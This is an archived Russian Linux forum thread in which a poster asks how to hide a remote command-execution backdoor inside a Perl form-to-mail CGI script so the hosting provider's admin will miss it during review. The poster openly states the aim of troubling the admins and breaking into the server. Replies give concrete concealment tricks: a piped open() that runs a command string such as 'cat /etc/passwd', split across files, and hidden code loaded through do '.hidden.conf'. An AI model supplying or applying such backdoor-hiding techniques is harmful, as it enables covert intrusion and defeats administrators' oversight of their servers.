LINUX.ORG.RU

Прошу совета, если это вообще реализуемо.


0

0

Вот такая задача встала. Веб-сервер под Юникс. Надо написать на Перл скрипт, обрабатывающий форму и отсылающий ее на мейл. Это ерунда конечно.
Но помимо этого очень хочется добавить в скрипт возможность принимать (например через PATH_INFO) юникс-команду, чтобы скрипт ее выполнял, а результаты также не мейл слал.
То есть указываешь в URL "/ls|namedir", и на мейл приходит список файлов в указанной директории сервера (если прав хватит конечно). Это тоже реализуемо.
Но проблема в том, что при размещении скрипта админ провайдера будет его проверять "на вшивость", поэтому явно указывать в скрипте команду system ("PATH_INFO") было бы глупо, так как заметит же и скрипт не разместит.
Вот и хотелось бы узнать какие есть возможности камуфлирования в тексте скрипта подобных команд, чтобы они не бросались в глаза?  Это вообще реализуемо?
anonymous

:) Поставить свой собственный сервер на collocation и забыть про админов провайдера..

anonymous
()

Ставить свой сервер это конечно замечательно, но ведь суть именно в том, чтобы немного осложнить жизнь админам провайдера. Так что вопрос остается в силе. :)

anonymous
()

Не думаю что есть смысл париться, так как скорее всего что бы ты не на мутил админ (если руки прямые Ж-)) все равно просечет. Поэтому если задача стоит в том что бы ломануть сервак то лучше пойти другим путем.

fire
()

В том-то и дело, что админ лох и камуфляжа не заметил бы, а вот сервер настраивал правильный человек, стоит FreeBSD 2.2.5 и как ее поиметь я пока не представляю. Эх, жалко..

anonymous
()

Можно поэкспериментировать с open(FILE, $path), типа
$path="cat /etc/passwd";# ="PATH_INFO"
....
$path.="|";
....
open(FILE, $path);
....
while(<FILE>){
print;
}

если правильно разнести комманды по разным частям файла, а еще лучше
по разным файлам то будет рудно догадаться что такой код запускает прогу.

Alximik
()

Ага, спасибо, что-то подобное я и предполагал. А интересно, что-то типа #include нет в Перле? Притом, чтобы инклюдилось уже на этапе выполнения. Размечтался. :))

anonymous
()

Есть типа #include --- команда do "filename":
do ".hidden.conf";
----.hidden.conf-------------
#Любые перловские комманды
$_=<>;
....

Alximik
()

Обыскал всю документацию, но ничего пока об этом не нашел, даже странно. Но за идею спасибо, буду еще искать. Спасибо!

anonymous
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.